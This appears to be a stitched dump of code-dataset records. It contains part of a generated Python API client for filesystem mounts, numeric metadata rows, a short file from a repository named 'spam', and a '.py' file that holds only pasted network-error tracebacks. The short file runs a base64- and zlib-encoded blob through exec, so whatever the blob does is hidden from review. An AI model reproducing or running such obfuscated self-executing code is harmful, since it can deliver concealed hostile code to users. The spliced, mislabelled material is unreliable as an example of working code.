_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_mount_filesystem(self, body, **kwargs): # noqa: E501
"""Create filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_mount_filesystem(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MountInformation body: The filesystem to mount (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_mount_filesystem_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_mount_filesystem_with_http_info(body, **kwargs) # noqa: E501
return data
def create_mount_filesystem_with_http_info(self, body, **kwargs): # noqa: E501
"""Create filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_mount_filesystem_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MountInformation body: The filesystem to mount (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Delete filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.delete_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def delete_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Delete filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `delete_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disconnect_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Disconnect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disconnect_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to disconnect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.disconnect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.disconnect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def disconnect_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Disconnect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disconnect_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to disconnect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disconnect_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `disconnect_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/disconnect', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_mounts(self, **kwargs): # noqa: E501
"""Get all mounts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_mounts(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get mount information. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: MountInformationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_mounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_mounts_with_http_info(**kwargs) # noqa: E501
return data
def get_all_mounts_with_http_info(self, **kwargs): # noqa: E501
"""Get all mounts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_mounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get mount information. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: MountInformationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_mounts" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformationList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mount_by_id(self, mount_id, **kwargs): # noqa: E501
"""Get mount by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mount_by_id(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to get (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mount_by_id_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.get_mount_by_id_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def get_mount_by_id_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Get mount by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mount_by_id_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to get (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mount_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `get_mount_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remount_mount_filesystem(self, mount_id, body, **kwargs): # noqa: E501
"""Remount filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remount_mount_filesystem(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remount_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
else:
(data) = self.remount_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
return data
def remount_mount_filesystem_with_http_info(self, mount_id, body, **kwargs): # noqa: E501
"""Remount filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remount_mount_filesystem_with_http_info(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remount_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `remount_mount_filesystem`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `remount_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/remount', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_mount_filesystem(self, mount_id, body, **kwargs): # noqa: E501
"""Update filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mount_filesystem(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
return data
def update_mount_filesystem_with_http_info(self, mount_id, body, **kwargs): # noqa: E501
"""Update filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mount_filesystem_with_http_info(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `update_mount_filesystem`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `update_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.142138 | 142 | 0.609062 | 3,684 | 31,913 | 5.010043 | 0.04696 | 0.046378 | 0.024273 | 0.031208 | 0.960069 | 0.959582 | 0.948204 | 0.937314 | 0.932167 | 0.929891 | 0 | 0.01487 | 0.304578 | 31,913 | 794 | 143 | 40.192695 | 0.816789 | 0.315796 | 0 | 0.81106 | 1 | 0 | 0.180413 | 0.052746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039171 | false | 0 | 0.009217 | 0 | 0.105991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8d5783e3a968024ee1976594fb9c6cbdc718ffd5 | 662 | py | Python | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | 2 | 2021-01-17T03:52:35.000Z | 2021-03-02T18:51:12.000Z | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | null | null | null | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | 5 | 2021-01-18T16:31:59.000Z | 2021-07-12T06:08:53.000Z | import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("eJzVVMFKw0AQvecrhirYCk1OovRWBHurop40EtPa2thmU2KKaBOQnj1U2GIRBVEvgke/aL/EmdlsquIH6JLMzM68N292CenGUQgXfixsMhCEwyhOYNVagupqFdrRSSBOazBKutUNylgnnS60RFyu1CwYxoFIoNwtlUrWuN8RGeDyeBUBRRiDXiahPZIiItkrOuFCqokYAThsQedc2mMpBaOUQpk5mMI49bwKOge8nIUbZDl5YJTAs0np2NZ5DB3ieIaFjUgpNaRcySUS9fdSHodZNJTrgc65Tl4qlFx9fHslZZ+y40HNpnBg5dczDsJMzaSaTdXsTsl3ADRjX5xlv1RvlLxWcooIHSCAkN8RU7Y5tJDRuCfGvSg5IZ0Jtf9efaE0vUo+sMzcDHEL+HJhYsqvP07xhpA3JT9Yel4E+Wk05p6E5RcExcUE9zzfI9eksQS1mH39/Mcf/BRGIjtcPoL6KOlFMV5NDcb9QGS7/mXPFw1fXC0wTT/0YW+zwNQHg+39nUW9ESS9UWvRo5ckw/Oa45xy3m5HoaPbHqyvLVhbfrvTiqJ+oVwnCDTqzYN/cov4c6lYn+cTJdE="))) | 331 | 635 | 0.953172 | 26 | 662 | 24.269231 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 0.003021 | 662 | 2 | 635 | 331 | 0.828788 | 0 | 0 | 0 | 0 | 0.5 | 0.892911 | 0.892911 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
8d68c5b57b8d32eecf44653744baf367dbfb01d8 | 14,387 | py | Python | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | saving BTC_RADS
retrieving orderbooks...
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
